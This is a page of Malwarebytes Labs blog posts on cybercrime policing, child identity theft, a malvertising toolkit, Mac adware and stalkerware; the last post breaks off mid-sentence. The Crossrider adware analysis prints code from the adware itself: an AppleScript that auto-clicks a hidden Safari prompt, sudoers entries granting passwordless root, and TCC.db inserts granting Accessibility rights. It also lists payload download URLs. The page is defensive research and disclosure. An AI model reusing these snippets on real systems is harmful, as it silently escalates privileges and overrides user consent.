IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Are our police forces equipped to deal with modern cybercrimes?

“You should have asked for the presence of a digital detective,” Karen said when I told her what happened at the police station. I had accompanied a neighbor, who is a small business owner, that had been hit with ransomware and wanted to file a report. After listening to his story, the police officer at the desk asked if my neighbor had a description of the perpetrator. I may have groaned.

This wasn’t the first time I was disappointed by the lack of technical knowledge of the police. I had filed an online report about a sextortion scam months earlier and received a reply that said: “If you haven’t paid, you can delete the mail. If you did pay, we can handle your report.”

My offer to send them the full source of the email fell on deaf ears. No attempt was made to initiate a take-down or explain why deleting the email was enough. I happen to know how this works, but other victims might not know that sextortion emails are just bluffing. What’s to stop them from paying in the future?

Knowing how to report cybercrimes

Karen is a former Dutch police officer, and she knew that for reporting cybercrimes, there are police officers that have special training, the so-called “digital detectives.” In the Netherlands, they are officially called digital experts. I could have avoided disappointment if I had known the proper procedure to reach a digital expert.

In the United States, there may be an officer assigned to cyber, but in most precincts, it’s the person who happens to be on desk duty or the person who uses technology the most. The situation is even more dire at the local level.

For the ransomware case, we should have made an appointment and specifically asked for a digital expert to be present because we wanted to report a cybercrime. And online cybercrime reports are only possible in common cases, such as Microsoft tech support scams. They have standard forms you can fill out and submit.

While the experience was frustrating, it made me realize that police officers are not trained for expertise in all the new cybercrimes that have surfaced over the last few years. Comparing these individual experiences to the stories we read about elite police cyber units like Interpol, FBI, and the Dutch Team High Tech Crime, I realized the situation in local districts is much different from those highly specialized, national teams. Here’s what I learned after some digging around.

Cyber training

When asked, the Dutch police informed me that they have special training courses for digital experts, just like they have experts for drug-related crimes and financial experts. The digital experts can receive training in forensics, hacking, threat hunting, hardware access, reverse engineering, digital tracing, and network analysis. All these trained experts provide assistance in cases where their expert knowledge is advantageous.

In the UK, they seem to be one step ahead. Every police force now has a cybercrime unit, which will investigate and pursue offenders, help businesses and victims protect themselves from attack, and prevent vulnerable individuals to become cybercriminals. Of course, we know the US, where cybercrime is most common, only has a dedicated cyber team with the FBI. While there are FBI offices around the country, they aren’t present at every police station.

This shows us that different countries have their digital detectives organized in different ways. And it is good to be aware of their existence and the best procedure in your location to get their help if you need it.

International cooperation against cybercrime

One of the obvious difficulties in apprehending criminals that have defrauded people or organizations in your own country is that the criminal is likely to be across a few borders. And sometimes, the criminals are protected by a regime that is likely to turn a blind eye as long as the criminals only operate abroad.

International cooperation as we have seen in the take-over of dark web marketplaces, is not only important when it comes to crime fighting, but can also be of great value in cyberwar. There is already enough evidence of state-sponsored attacks on critical infrastructure, and it is important to know what these enemy forces are up to and capable off.

Sometimes, there are more effective ways to cripple an international gang of cybercriminals than to try and arrest them. One example is the No More Ransom initiative, where decryption keys for certain ransomware families are published. This brings down the income of the cybercriminal, and with that, it hopefully takes away their incentive to proceed on the path of crime.

Cyberbullying

The Internet and social media have introduced some forms of bullying that arguably might benefit from police involvement. Where in older times you might say, “Sticks and stones may break my bones, but words will never hurt me,” modern-day cyberbullying has a bigger, long-range impact. Someone posting compromising pictures or movies on social media can be hurtful for a long time.

Social media platforms are slow to respond to take-down requests, and a little pressure from the authorities might expedite their actions. Victims of cyberbullying, however, tend to receive little to no help from the authorities.

Investing in police skills

To meet a growing demand for specialized experts, the police force will need a good deal of extra funds and staff. The cost of failing to adequately meet these demands may result in heavier losses than society can afford. So even if we feel that we cannot free up the funds for these measures, consider that organizations, consumers, and governments may be handing out the same amount to cybercriminals, the equivalent of throwing money into a bottomless pit. In addition, the costs of recovering from cyberattacks are far higher than what we might pay in training.

digital expert
A digital expert has to have knowledge about many fields

Digital experts can also be a useful asset when it comes to solving non-cybercrimes. In many cases, digital evidence may help the police locate criminals, view criminal activity around a home or business, or prove criminal intent.

For example, digital evidence might help place people and events within time and space to establish causality for criminal incidents. But collecting and submitting digital evidence legally requires different tools and processes from doing so for physical evidence, so a trained expert will be able to extract more evidence from the same device(s). They can do so not only by knowing where to look, but also by having the knowledge of how to handle a device so that no evidence gets destroyed.

Recommendations

At least every police station or sheriff’s office should have one digital expert available to at least take in reports of cybercrimes. These experts will know which information is needed to have a chance of apprehending the criminal, can advise the victim on how to proceed, and maybe help prevent them from becoming a victim again.

If this is not an achievable goal, set up
an easy-to-use site to report cybercrimes online, where a special department of
digital experts can do a triage, spot trends, and involve other departments
where that is beneficial.

International cooperation will become even more important if we want to stand a chance against cybercriminals, whether they are organized in groups or groups of individuals that buy malware-as-a-service on the dark web.

The International Code of Conduct for Information Security is an international effort to develop behavioral norms in the digital space, submitted to the UN General Assembly in 2011 and in revised form in 2015. This code should be worked out in more detail and allow for international cooperation against cybercrime. And diplomatic efforts should be made to get this code ratified by more UN members.

Stay safe, everyone!

Special thanks to the Department of
Communication of the Dutch Police Academy and the Media Desk of the Rotterdam
police department.

The post Are our police forces equipped to deal with modern cybercrimes? appeared first on Malwarebytes Labs.

Child identity theft, part 1: On familiar fraud

In 2013, 30-year-old Axton Betz-Hamilton received an angry phone call from her father two weeks after her mother, Pam, died.

“What the hell were you thinking?” he screamed. He had just unearthed a credit card statement in her name that had run over its limit from a box of her mother’s paperwork.

Betz-Hamilton reasoned that the statement must be from one of the credit cards taken out by her identity thief, who had been using her Social Security number (SSN) since she was only 11. She wondered what the statement was doing in her mother’s possession.

“I don’t know,” her father had said, “but it’s here in this file folder, along with your birth certificate.” At that moment, Betz-Hamilton knew she had found the elusive identity thief who destroyed her life and put her father and long-dead grandfather into severe debt. Her own mom.


Identity theft is a genuine problem that strikes fear in most adults. For parents or guardians of children under the age of 18, however, the thought may not come to mind. However, child identity theft does happen, and this type of fraud is, frighteningly, becoming more common.

Child identity theft, also known as child identity fraud, usually occurs when someone takes a minor’s personally identifiable information (PII) and other data. At the top of the list is the Social Security Number (SSN), which parents usually receive as soon as their child is born. Other data that can be swiped are children’s names, physical addresses, dates of birth, and social media credentials.

A study by Javelin Strategy & Research revealed that, overall, more than 1 million US children had their identities stolen in 2017.

Having a child’s identity stolen is not that different from stealing an adult’s identity. In most cases, minors’ data is leaked through data breaches. Sometimes, parents inadvertently give away their child’s data, not knowing that they can choose to mostly withhold it.

Take, for example, a mother who fills out forms at the doctor’s office. Although many healthcare providers ask for an SSN, it is not always required. Instead, the Federal Trade Commission (FTC) advises parents and guardians to provide an alternative form of identification. Or they can also only give out the last four digits of the child’s SSN.

Child identity fraud has also been linked with cyberbullying. The 2018 Child Identity Fraud Study found that both bullying and fraud arise from the same vulnerabilities in a child: the tendency to overshare personal information online.

“Children who are unprepared to protect themselves from online risks are likely to encounter individuals who wish to target them emotionally or financially,” said Al Pascual, Senior Vice President, Research and Head of Fraud & Security at Javelin Strategy & Research. “Bullied children may be more vulnerable to fraud as they are taken advantage of when they seek friendship online.”

Minors who are cyberbullied are at least nine times more likely to be victimized by fraudsters compared to those who aren’t bullied. But another emerging trend in child identity theft establishes an even more worrying trend: What happens when the very people children should trust with their information are the ones abusing it?

What is familiar fraud?

While we usually connote adult identity theft with anonymous scammers, child identity theft may not always be conducted by the faceless, hooded hacker we see in stock photos and crime dramas.

Javelin Strategy & Research’s 2018 study found that 60 percent of child identity fraud victims personally know their thief. Known scammers range from the child’s parent, relative, or family friend to a hired caretaker or teacher. This is called familiar fraud.

Familiar fraud is a type of fraud wherein family members are found out as perpetrators of identity theft within the family. It’s a husband stealing his wife’s identity, aunties stealing their niece’s identity, one sibling after another’s, or—in Betz-Hamilton’s case—a parent stealing their child’s, partner’s, and father’s identities.

Sometimes, fraud is also considered “familiar” in nature if it is perpetrated by someone who is close to the family but not blood relatives. This could be friends, neighbors, or even coworkers.

Unlike other fraud, familiar fraud isn’t always conducted with an intent to harm. Sometimes, parents steal and use their child’s identity to subscribe to services, giving the reason that the child benefits from these services as well. However, according to Robert P. Chappell Jr., law enforcement veteran and author of the book Child Identity Theft: What Every Parent Needs to Know, this justification is a stretch.


Recommended reading: What is identity fraud?


There are several motivations behind identity thieves within the family. A parent or relative might be acting out of desperation, such as wanting to receive healthcare benefits but being unable to apply because they struggle with bad credit. At times, it is suggested, such relatives couldn’t help it due to psychiatric and psychological issues. Let us also not discount plain old greed.

Familiar fraudsters often keep the fraud going for as long as they can. Since they usually know their victim enough to pose as them and have ready access to mail with sensitive information—thus making familiar fraud another form of crime of opportunity—they can easily access accounts and even open new ones under their victim’s name.

When familiar fraud is brought to light, victims are forced to make a difficult decision: file a report against a family member or stay in debt. Sadly, victims tend to go for the latter. They are reluctant to file a report against their familial identity thief or cooperate with fraud investigations as they don’t want to get them in trouble despite of the trouble this has caused them. They also do this to avoid family backlash, drama, and to preserve family relationships.

If victims do take action on the familiar fraud, they don’t often get support from other family members as they find it unfathomable for a relative to be perpetrators of fraud against another relative.

If familiar fraud victims are willing to give their relative thief a pass, they are only putting themselves at a disadvantage. This is because it limits them from the available options, they can take to address the problem, which is their sullied identities due to poor credit. No police report or fraud investigation could also mean that lenders would be less inclined to consider their debt as fraudulent.

What are the repercussions of child identity theft within the family?

Effects of fraud, in general, could be immediate and
long-lasting. But familiar fraud drags a lot more with it. It can go beyond
merely going out of pocket fighting the problem (although this is a significant
one). Familiar fraud deeply affects victims mentally, emotionally, and
sometimes physically.

Apart from a wrecked credit, child victims of identity theft may find it difficult to believe that someone they fully trust, such as a parent, could harm them this way by letting them pay for their bad debts. This leads to emotional and psychological trauma. They may feel violated, betrayed, and guilty. In a study, Experian found that adults who had been child fraud victims reported feeling stressed, angered, and concerned. The experience also affected their feelings of self-worth, thus tending to feel suicidal.

Not only that: the physical well-being of identity fraud victims may manifest signs of struggle from the ordeal. In a 2017 Identity Theft: The Aftermath report [PDF], the Identity Theft Resource Center (ITRC) reported that stress (64.3 percent) topped the list. This is followed by loss of concentration or focus (37.1 percent); fatigue (35 percent); aches, pains, stomach issues, heart palpitations, and sweating (23.1 percent); sleep disturbances (48.3 percent); and an inability to work due to these physical symptoms (28.7 percent). This is why a number of victims usually seek the help of professionals to deal with their trauma.


In part 2 of this blog series, we’ll be touching on signs that your child’s identity may have been compromised, the digital footprints parents leave behind for their kids and the correlation to fraud, and how parents can reclaim their child’s identity.

The post Child identity theft, part 1: On familiar fraud appeared first on Malwarebytes Labs.

Lock and Code S1Ep1: On RSA, the human element, and the week in security

Last week, we told you we were launching a fortnightly podcast, called Lock and Code. This week, we made good on our promise, with lots of headlines generated right here on Labs, as well as other security news around the web. In addition, we talk with Britta Glade, Director of Content and Curation for RSA Conference, about the theme for last week’s conference: “The Human Element,” plus which types of submissions do well and what types will almost always be rejected.

Tune in for all this and more on the premiere episode of the first season of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus, other cybersecurity news:

  • All ears: Are your smart devices around the home accidentally tuning in to your conversations? (Source: Moniotrlab)
  • Think that group is private? Think again: Certain private WhatsApp group invites are being indexed in Google. (Source: Vice)
  • Another day, another breach: This time around, it’s Slickwraps who feel the burn via content posted to a Medium blog. (Source: The Verge)
  • Scammers go for gold: It’s Olympics time again, and that means scams are almost certainly on the way (Source: Tech Republic)
  • E-scooters vulnerable to attack? Researchers report their findings on how open to abuse these popular devices are. (Source: ITP.net)

Stay safe, everyone!

The post Lock and Code S1Ep1: On RSA, the human element, and the week in security appeared first on Malwarebytes Labs.

Domen toolkit gets back to work with new malvertising campaign

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we had ever seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

forumpost

A couple months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

tendermeets

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

tendermeetstraffic

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

vpntemplate

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

searchonetraffic

The payload is this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

diagram

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

templates

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit

search-one[.]info
panel-admin[.]best
mix-world[.]best

Smoke Loader

1a91b2a3a252554842de875c89f6eee105bc419d7e32d3a5c9f0f9078780ab30
vuterfaste[.]ru

IntelRapid

46.166.129[.]235/forum/files/client.exe
33d5f80242b4006ce14bba56692e1936157e0216b93faac823c42cc3f9ab4ec1

Vidar

46.166.129[.]235/forum/files/mass.exe
76ce130d2447f71bea8ed902959fd7e0aeac86b55f9e44a327c1f1c1bd73ba3f
molothunsen[.]com

Buran/Zeppelin

semantrus.pw/upload/open.exe
0163bb148d4eb632d00d6d3080e07bba46f2f3549e8f95a8ca8951c10280694f

Vidar

cq08462.tmweb[.]ru/88.exe
628a9c97a55155f60d3b5ae29bc64f1dca5a6baf2b4f6a1a1de5e836cd4fb73f
desperate[.]website

The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.

Mac adware is more sophisticated and dangerous than traditional Mac malware

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

http://cdn.mycouponsmartmac.com/download/Mac/InstallerResources/pwr.zip

This file is expanded into an app named mm-install-macos.app. The sole purpose of this app is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

password phishing dialog mac adware

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed webtools.app is downloaded and executed using the phished password to run as root:

http://cdn.myshopcouponmac.com/download/Mac/InstallerResources/wt.zip

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

obscured screen during installation

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

http://dl.searchmine.net/download/Mac/InstallerResources/unified/SearchMine/imsearch.tar.gz

This is extracted, and an install.sh script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000}
 tell application "System Events"
     set visible of process "Safari" to false
     tell application process "Safari"
         set frontmost to true
         log "Clicking button 1 of sheet 1"
         tell window 1 to tell sheet 1 to click button 1
         delay 1
     end tell
 end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

http://service.macinstallerinfo.com/Mac/getInstallScript/scripts/bin/iwt.bin

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750 line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

payload templat mobile config file

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

managed preferences content

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the higest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added to allow a couple of the installed processes to have root permissions when running on the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate
someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file, interfering with the ability to get root permissions. This can affect software installation abd the ability to troubleshoot, and is difficult to fix. (In order to fix the sudoers file, you must have root access, which you can’t get because the sudoers file is broken—it’s a catch-22.)

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).

someuser ALL=(ALL) NOPASSWD:ALL

These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac processes in the first example (which would not require special access), it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.

TCC.db

In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then     /usr/bin/sqlite3 <<EOF
 .open '${TCCDB}'
 insert or replace into access values('kTCCServiceAccessibility','com.apple.Terminal',0,1,1,NULL,NULL);
 ...
 insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/installOffers.sh',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.mm-install-macos.www',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.mm-installer-macos.www',0,1,1,NULL,NULL);
 .quit
 EOF
     fi

This only works on older systems, as the TCC.db file is read-only by anything other than the system on recent versions of macOS. However, on an older system, this can give powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data.

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly-generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.

IOCs

The following indicators of compromise are associated with this adware.

Domains

http://www.weknow.ac
http://*.searchmine.net
http://client.mm-bq.host
http://service.macinstallerinfo.com
http://*.macmymacupdater.com
http://*.mycouponsmartmac.com
http://*.myshopcouponmac.com
http://*.mycouponizemac.com
http://*.shopperifymac.com
http://*.shoppinizermac.com
http://*.couponizermac.com
http://*.surfbuyermac.com
http://*.surfmatemac.com
http://*.myshopbotmac.com
http://*.myshopmatemac.com
http://*.bestsmartshoppersmac.com

Files

searchmine.sh 441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9
mm-install-macos ee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51
webtools 888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31
imsearch.tar.gz e07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08
install.sh 591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031
iwt.bin 168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361
gui_scripting.sh df402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9f
installSafariExtension 212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14
installSafariHpNt 18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9a
update_legacy_chrome.py    b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064
updatePreferences.py 6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.

Stalkerware and online stalking are accepted by Americans. Why?

Despite warnings from domestic abuse networks, privacy
rights advocates, and a committed faction of cybersecurity vendors, Americans may
be accepting and minimizing online stalking behaviors, including the use of
invasive apps that can pry into a user’s text messages, emails, photos, videos,
and phone logs.

The limited opposition to these at-times abusive behaviors
was revealed by a new
study conducted by NortonLifeLock
, consumer cyber safety vendor and founding
member of the Coalition Against
Stalkerware
, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of
individuals between the ages of 18 and 34 said they found online stalking to be
“harmless.” Further, the study revealed that 1 in 10 Americans admitted to
using digital monitoring apps—sometimes referred to as stalkerware—against
their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot exact whether the NortonLifeLock
survey results represent a shift in attitudes or reflect a long-held acceptance
of surveillance culture online. While US government agencies have recorded
stalking statistics for decades, those same agencies either have not recorded
admissions of online stalking behavior and perceptions of its harms, or did not
respond to requests for such data.

However, domestic abuse advocates and researchers agreed
that several factors play a role in the public’s acceptance of this type of
behavior. Many romantic comedy films romanticize stalking, while increasingly
more consumer home devices have normalized private, digital surveillance.
Further, current mobile apps have turned the viewing of someone’s private life
into an otherwise harmless interaction.

More likely, though, is that the public has always failed to
recognize and respond to the actual harms of stalking, said Elaina Roberts,
technology safety legal manager with National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in
my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed
more than 2,000 adults in the United States about “online creeping”—behavior
that includes consistent, stealthy tracking of someone online, which could also
veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents
admitted to “stalking” an ex or current partner online “by checking in on them
without their knowledge or consent.”

The most common forms of online stalking included checking a
current or former partner’s phone—at 29 percent—and looking through a partner’s
search history on one of their devices without permission—at 21 percent. Disturbingly,
9 percent of respondents admitted to creating a fake social media profile to
check in on their partners, and 8 percent of respondents admitted to tracking a
partner’s physical activity through their phone or through a health-related
app.

Kevin Roundy, technical director for NortonLifeLock, warned
about these behaviors.

“Some of the behaviors identified in the NortonLifeLock
Online Creeping Survey may seem harmless, but there are serious implications
when this becomes a pattern of behavior and escalates, or when stalkerware and
creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the
top two answers revealed a lack of trust and an itching, potentially harmful level
of concern; 44 percent said “they didn’t trust [their partner] or suspected
they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly
every category, men found it more acceptable to engage in these behaviors and
to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if
they are being stalked online by a current or former partner as long as they
are not being stalked in person,” it was 43 percent of men who agreed with that
statement versus 27 percent of women. Further, 20 percent of men said they
tracked a current or former partner’s location, versus 13 percent of women. Men
also showed that they more readily accepted online stalking if one or both of
the partners in a relationship had cheated or were merely suspected of
cheating.

These results reflect broader statistics in America about
who is more often victimized by stalking.

According to a national report of about 13,000 interviews
conducted by the Centers for Disease Control and Prevention (CDC), an estimated
15.2 percent of women and an estimated 5.7 percent of men have been stalked in
their lifetime. Women who said they were stalked during their lifetimes stated
they were the target of a variety of behaviors, including being approached at
home or work (61.7 percent); receiving unwanted messages like texts and voice
mails (55.3 percent); and being watched, followed, or spied on with a
“listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of
